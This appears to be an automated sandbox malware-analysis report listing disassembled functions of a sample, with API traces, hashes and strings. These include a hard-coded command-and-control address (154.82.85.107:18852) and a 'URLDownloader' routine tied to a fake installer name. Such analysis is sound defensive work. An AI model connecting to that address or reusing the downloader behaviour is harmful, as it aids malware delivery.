                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID:
                                                                                    • API String ID: 2299586839-0
                                                                                    • Opcode ID: a7720191fadc5b59f9293200741afc173400299f42e44f13b71ffd044a7ac7a5
                                                                                    • Instruction ID: 32c953e8add9b443c25677096d2b0c3be2c19464cd60e54ae3a18f2e3060646b
                                                                                    • Opcode Fuzzy Hash: a7720191fadc5b59f9293200741afc173400299f42e44f13b71ffd044a7ac7a5
                                                                                    • Instruction Fuzzy Hash: CBD05EB150821CBEB60082EA9D82EB6B79CE708324F200612FB14C61C2E696EE015224
                                                                                    Function 00CD0AE4 Relevance: .1, Instructions: 87COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                    • Instruction ID: 0b686331e42d228877cee2e921b437bce4a8e5320232e9d9603cb742e160d61d
                                                                                    • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                    • Instruction Fuzzy Hash: EC317C76A083469FC710DF18C480A2AB7E4FF89318F29096EEA9597312D370FA558B91
                                                                                    Function 0040AC84 Relevance: .1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
                                                                                    • Instruction ID: e7cf9ad10a3c06237dd87dcbde6390057bb8d3fe26e0f0c9e2bb12da4eec98f8
                                                                                    • Opcode Fuzzy Hash: d17ffc1b7c175c9f3f133bcf490b3ef334a0cf6f2a578ee1034f9dfeca47056c
                                                                                    • Instruction Fuzzy Hash: A001C432B047110B870CDD3ECD9862AB6C3ABC8A10F09C63E9589C77C4CD318C1AC286
                                                                                    Function 004067C0 Relevance: .0, Instructions: 14COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                    • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                                    • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                    • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                                    Function 10015490 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 163networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                    • getaddrinfo.WS2_32(154.82.85.107,18852,?,00000000), ref: 100154FA
                                                                                    • WSACleanup.WS2_32 ref: 10015509
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                    • socket.WS2_32(?,?,?), ref: 10015552
                                                                                    • WSACleanup.WS2_32 ref: 10015566
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                    • String ID: 154.82.85.107$18852
                                                                                    • API String ID: 2357443324-1825080259
                                                                                    • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                    • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65
                                                                                    Function 10016EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 154memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,10001A66,00000000,00000000,65E83C72,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016F29
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016F65
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,?,00000000,00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FA4
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 10016FAF
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FC0
                                                                                    • _com_issue_error.COMSUPP ref: 10016FD8
                                                                                    • _com_issue_error.COMSUPP ref: 10016FE2
                                                                                    • GetLastError.KERNEL32(80070057,65E83C72,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016FE7
                                                                                    • _com_issue_error.COMSUPP ref: 10016FFA
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017008
                                                                                    • GetLastError.KERNEL32(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017010
                                                                                    • _com_issue_error.COMSUPP ref: 10017023
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2078710212.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2078692733.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078732895.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078752146.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2078770707.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWidefree$AllocStringmalloc
                                                                                    • String ID: r<e
                                                                                    • API String ID: 2710271231-3210016143
                                                                                    • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                    • Instruction ID: 6285890bd5176054e2d15964e4e0697efcddc290ec620ce681aa416c4b1e3c3a
                                                                                    • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                    • Instruction Fuzzy Hash: EA41C3B5A00219ABD700CFA8DC45B9EBBE9FB4C650F114229F509EB281D735E981CBA0
                                                                                    Function 00650AA8 Relevance: 21.3, APIs: 6, Strings: 6, Instructions: 260COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ShowWindow.USER32(?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000,?,0065134E,00000000,00651358,?,00000000), ref: 00650B2F
                                                                                    • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000,00000000), ref: 00650B55
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF), ref: 00650B76
                                                                                    • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00650E6B,?,?,00000000,?,00000000), ref: 00650B8B
                                                                                      • Part of subcall function 005B0518: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,005B05AD,?,?,?,00000001,?,005FB63E,00000000,005FB6A9), ref: 005B054D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$FileModuleMultipleNameObjectsWait
                                                                                    • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                    • API String ID: 66301061-3672972446
                                                                                    • Opcode ID: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction ID: 454a7f8a8ebd9c9c0472cbc412e74aa99abd709555709b689d3e6ddf3cb357b8
                                                                                    • Opcode Fuzzy Hash: 11ff9a5d668dd4f2d7e6ff84b01d56f7ef7fac016dca03f85604f83c2993ff07
                                                                                    • Instruction Fuzzy Hash: 9491E430A042099FEB10EBA4C856BEEBBF6EF49301F614864FD00A7791DA75ED49CB54
                                                                                    Function 00643E0C Relevance: 21.2, APIs: 3, Strings: 9, Instructions: 223COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CoTaskMemFree.OLE32(?,00644047,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064403A
                                                                                    • CoTaskMemFree.OLE32(?,0064409A,?,00000000,00000000,?,0064F4D6,00000006,?,00000000,0064FAA0,?,00000000,0064FB5F), ref: 0064408D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 734271698-544719455
                                                                                    • Opcode ID: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction ID: dd5fc3daa821dda1b6518f9a5080d1dcac5ab9c80f6433aa49f69c11db3ec318
                                                                                    • Opcode Fuzzy Hash: d362a8e580703c39958d1ab9fec0a02ec5da2bad2a648030e91cff165734e93c
                                                                                    • Instruction Fuzzy Hash: 7A8167346002459BDB10EFE4DC46BAE7BA7EB84704F60542AE400B7792CEB8AD55CF66
                                                                                    Function 00CD1637 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 179windowregistrythreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000), ref: 00CD1659
                                                                                      • Part of subcall function 00CD1407: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 00CD1462
                                                                                      • Part of subcall function 00CD1407: CoTaskMemFree.COMBASE(00000000), ref: 00CD14B5
                                                                                    • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 00CD176F
                                                                                    • RegisterClassW.USER32(?), ref: 00CD17CE
                                                                                    • GetSystemMetrics.USER32(00000001), ref: 00CD17D6
                                                                                    • GetSystemMetrics.USER32(00000000), ref: 00CD17E9
                                                                                    • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 00CD1835
                                                                                    • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?), ref: 00CD1844
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CD186B
                                                                                    • TranslateMessage.USER32(?), ref: 00CD1879
                                                                                    • DispatchMessageW.USER32(?), ref: 00CD1883
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$CreateMetricsSystemWindow$ClassDispatchFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslate
                                                                                    • String ID: URLDownloader$wpsv.5.6.3.exe
                                                                                    • API String ID: 3953380684-244475150
                                                                                    • Opcode ID: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                    • Instruction ID: 7ddb1fa807b22b4d36432a7fac7ff41a6bfc2d806b3c88c074d83b3bbedb89c7
                                                                                    • Opcode Fuzzy Hash: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                    • Instruction Fuzzy Hash: 78711CB1D00258EFEB14DFA8CC85BDDBBB4EF48700F10816AE609AB280E7749A45DF51
                                                                                    Function 00CE5467 Relevance: 19.7, APIs: 13, Instructions: 163networkCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00CE548A
                                                                                    • getaddrinfo.WS2_32(1001C0E0,100185B0,?,00000000), ref: 00CE54D1
                                                                                    • WSACleanup.WS2_32 ref: 00CE54E0
                                                                                    • socket.WS2_32(?,?,?), ref: 00CE5529
                                                                                    • WSACleanup.WS2_32 ref: 00CE553D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                    • String ID:
                                                                                    • API String ID: 2560534018-0
                                                                                    • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction ID: a3b182eb645ff2cb42151abe405b60b8ae5a3ad241c46a5b628835be6c01947f
                                                                                    • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction Fuzzy Hash: D06117B1904629EFE704CFA9CD88FAD77B5FB08309F108659E519A72A0D734DA40CF65
                                                                                    Function 0061AD2C Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 70sleepsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(?), ref: 0061AD63
                                                                                    • TerminateProcess.KERNEL32(?,00000001,?,00002710,?), ref: 0061AD7F
                                                                                    • WaitForSingleObject.KERNEL32(?,00002710,?), ref: 0061AD8D
                                                                                    • GetExitCodeProcess.KERNEL32(?), ref: 0061AD9E
                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061ADE5
                                                                                    • Sleep.KERNEL32(000000FA,?,?,?,?,00002710,?,00000001,?,00002710,?), ref: 0061AE01
                                                                                    Strings
                                                                                    • Helper process exited., xrefs: 0061ADAD
                                                                                    • Helper process exited with failure code: 0x%x, xrefs: 0061ADCB
                                                                                    • Helper process exited, but failed to get exit code., xrefs: 0061ADD7
                                                                                    • Stopping 64-bit helper process. (PID: %u), xrefs: 0061AD55
                                                                                    • Helper isn't responding; killing it., xrefs: 0061AD6F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseHandleProcess$CodeExitObjectSingleSleepTerminateWait
                                                                                    • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process. (PID: %u)
                                                                                    • API String ID: 3355656108-1243109208
                                                                                    • Opcode ID: c9807878450f3555804f3481b699adbde9aaaeedd93afa765d6bdd2e8624556d
                                                                                    • Instruction ID: 798cb82454b907f4610273c7cefa33f3cc1412bd95dfbe18a7574247b18f10f4
                                                                                    • Opcode Fuzzy Hash: c9807878450f3555804f3481b699adbde9aaaeedd93afa765d6bdd2e8624556d
                                                                                    • Instruction Fuzzy Hash: EF21AF706457409AC720EBB9D5417CBBAD69F19300F088D2DF19ACB692D7B4E8C09753
                                                                                    Function 00CE6E77 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 154memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00CD1A3B,00CD1A3D,00000000,00000000,r<e,?,?,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B,00CD27A3), ref: 00CE6F00
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00CD1A3B,?,00000000,00000000,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B), ref: 00CE6F7B
                                                                                    • SysAllocString.OLEAUT32(00000000), ref: 00CE6F86
                                                                                    • _com_issue_error.COMSUPP ref: 00CE6FAF
                                                                                    • _com_issue_error.COMSUPP ref: 00CE6FB9
                                                                                    • GetLastError.KERNEL32(80070057,r<e,?,?,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B,00CD27A3), ref: 00CE6FBE
                                                                                    • _com_issue_error.COMSUPP ref: 00CE6FD1
                                                                                    • GetLastError.KERNEL32(00000000,?,?,?,00CD1BBB,00CD1A3B,00000000,?,00CD1A3B,00CD27A3), ref: 00CE6FE7
                                                                                    • _com_issue_error.COMSUPP ref: 00CE6FFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                    • String ID: r<e
                                                                                    • API String ID: 1353541977-3210016143
                                                                                    • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                    • Instruction ID: 5587ba3f3628e7dfdc82ea26863c4817e34329e110ae889a49781d9ab0206843
                                                                                    • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                    • Instruction Fuzzy Hash: C4412BB1A14295EBDB10DFAADC45BAEBBA8FF58790F108229F515D7380D734DA00C7A0
                                                                                    Function 0064ED7C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 145fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 005F89FC: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AE7
                                                                                      • Part of subcall function 005F89FC: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,?,_iu,?,00000000,005F8B37), ref: 005F8AF7
                                                                                    • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EDFF
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,0064EF6A), ref: 0064EE26
                                                                                    • SetWindowLongW.USER32(?,000000FC,0064E478), ref: 0064EE60
